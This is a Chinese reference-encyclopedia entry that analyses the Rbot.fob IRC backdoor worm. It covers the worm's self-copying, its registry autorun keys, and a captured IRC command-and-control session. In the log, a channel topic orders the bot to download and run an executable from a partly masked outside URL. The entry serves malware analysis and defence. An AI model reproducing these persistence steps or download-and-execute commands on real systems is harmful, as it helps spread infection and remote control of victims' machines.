| 词条 | Backdoor.Win32.Rbot.fob |
| 释义 | 病毒标签:病毒名称: Backdoor.Win32.Rbot.fob 病毒类型: 后门 文件 MD5: 45D0455398BD893176EB34C4B319D618 公开范围: 完全公开 危害等级: 4 文件长度: 506,880 字节 感染系统: Windows98以上版本 加壳类型: Themida|WinLicense V1.9.2.0 -> Oreans Technologies [Overlay] * 病毒描述:该病毒运行后,复制自身到%System32%目录下,添加注册表自动运行项以随机引导 病毒体;连接网络下载病毒文件,病毒运行后自我删除,此病毒为一个利用Windows平台 下IRC协议的网络蠕虫,受感染用户可能会被操纵进行Ddos攻击、远程控制、发送垃圾邮 件、创建本地Tftp、下载病毒文件等行为。 行为分析:本地行为: 1、复制自身到 %system32% 文件夹下gwbuahihk.exe。 2、新增注册表: [HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft \\Windows\\CurrentVersion\\Run] 注册表值: "Winds Sersc Agts" 类型: REG_SZ 值: "zxnyjgzyu.exe" [HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft \\Windows\\CurrentVersion\\RunServices] 注册表值: "Winds Sersc Agts" 类型: REG_SZ 值: "zxnyjgzyu.exe 网络行为: 1、连接IRC服务器等待控制: 协议:TCP 连接服务器名:irc.priv****t.com 域名或IP地址: 209.250.232.2***:7000 加入的 IRC 频道名: #FAAK# 用户名:dcxvtfdxls (随机小写字母) 密码:9400002290 对目标主机的操作: /*昵称*/ NICK CHN|9400002290 /*欢迎信息*/ :irc.priv****.com NOTICE AUTH :*** Looking up your hostname... :irc.priv****.com NOTICE AUTH :*** Couldn't resolve your hostname :using your IP address instead :irc.priv****.com 001 CHN|9400002290 :irc.priv****.com 002 CHN|9400002290 : M0dded by uNkn0wn Crew :irc.priv****.com 003 CHN|9400002290 :irc.priv****.com 004 CHN|9400002290 :www.uNkn0wn.eu - iD@uNkn0wn.eu :irc.priv****.com 005 CHN|9400002290 :irc.priv****.com 005 CHN|9400002290 :irc.priv****.com 005 CHN|9400002290 /*设置用户属性与加入房间及返回相关信息*/ :irc.priv****.com 422 CHN|9400002290 :MOTD File is missing :CHN|9400002290 MODE CHN|9400002290 :+iwG :irc.priv****.com 302 MODE CHN|9400002290 -x+i JOIN #FAAK# saad. USERHOST CHN|9400002290 MODE CHN|9400002290 -x+i JOIN #FAAK# saad. USERHOST CHN|9400002290 MODE CHN|9400002290 -x+i JOIN #FAAK# saad. USERHOST CHN|9400002290 MODE CHN|9400002290 -x+i JOIN #FAAK# saad. :CHN|9400002290!dcxvtfdxls@219.147.182.*** JOIN :#FAAK# :irc.priv****.com 333 CHN|9400002290 #FAAK# G_G 1211382006 :irc.priv****t.com 302 CHN|9400002290 :CHN|9400002290=+dcxvtfdxls@219.147.182.*** :irc.priv****.com 302 CHN|9400002290 :CHN|9400002290=+dcxvtfdxls@219.147.182.*** :irc.priv****.com 302 CHN|9400002290 :CHN|9400002290=+dcxvtfdxls@219.147.182.*** /*加入房间#kok6*/ JOIN #FAAK# saad. /*用户信息显示*/ USERHOST CHN|9400002290 :irc.priv****.com 302 CHN|9400002290 :CHN|9400002290=+dcxvtfdxls@219.147.182.*** /*连接网络下载病毒*/ :irc.priv****.com 332 CHN|9400002290 #FAAK# :.jp]de100 http://members.ly***.co.uk/abosal7/usb.exe sty.exe :irc.priv****.com 333 CHN|9400002290 #FAAK# G_G 1211382006 /*服务器发送连接响应*/ PING :irc.priv****.com /*回应服务器*/ PONG :irc.priv****.com /*加入房间*/ JOIN #FAAK# saad. 2、连接网络下载病毒文件: 协议:TCP 域名或IP地址:http://members.l****.co.uk (213.193.4.**) 端口:80 对目标主机的操作:下载病毒文件 http://members.ly****.co.uk/abosal7/usb.exe 注: %System32% 是一个可变路径。病毒通过查询操作系统来决定当前 System文件夹的 位置。 %Windir% WINDODWS所在目录 %DriveLetter% 逻辑驱动器根目录 %ProgramFiles% 系统程序默认安装目录 %HomeDrive% 当前启动的系统的所在分区 %Documents and Settings% 当前用户文档根目录 %Temp% \\Documents and Settings \\当前用户\\Local Settings\\Temp %System32% 系统的 System32文件夹 Windows2000/NT中默认的安装路径是C:\\Winnt\\System32 windows95/98/me中默认的安装路径是C:\\Windows\\System windowsXP中默认的安装路径是C:\\Windows\\System32 注2:与IRC服务器的交互信息中,符号“/**/”内的数据是分析员对下一行或几行的注释信息,非为与服务器的交互信息内容。 |
| 随便看 |
百科全书收录4421916条中文百科知识,基本涵盖了大多数领域的百科知识,是一部内容开放、自由的电子版百科全书。